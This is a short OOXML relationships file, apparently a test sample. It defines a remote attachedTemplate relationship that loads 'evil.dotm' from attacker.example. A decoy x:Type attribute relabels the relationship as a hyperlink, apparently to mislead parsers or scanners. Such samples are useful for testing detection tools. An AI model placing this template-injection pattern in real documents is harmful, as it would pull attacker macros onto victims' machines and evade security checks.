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<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships" xmlns:x="urn:example:x"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" x:Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker.example/evil.dotm" TargetMode="External"/></Relationships>
</file>